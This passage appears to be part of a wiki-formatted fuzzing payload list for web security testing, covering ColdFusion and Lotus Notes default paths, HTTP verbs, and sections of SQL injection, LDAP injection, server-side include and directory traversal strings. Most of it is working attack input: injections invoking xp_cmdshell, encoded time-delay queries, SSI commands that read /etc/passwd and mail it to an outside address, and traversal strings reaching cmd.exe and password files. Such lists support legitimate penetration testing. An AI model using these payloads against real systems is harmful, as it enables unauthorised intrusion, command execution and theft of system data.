.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
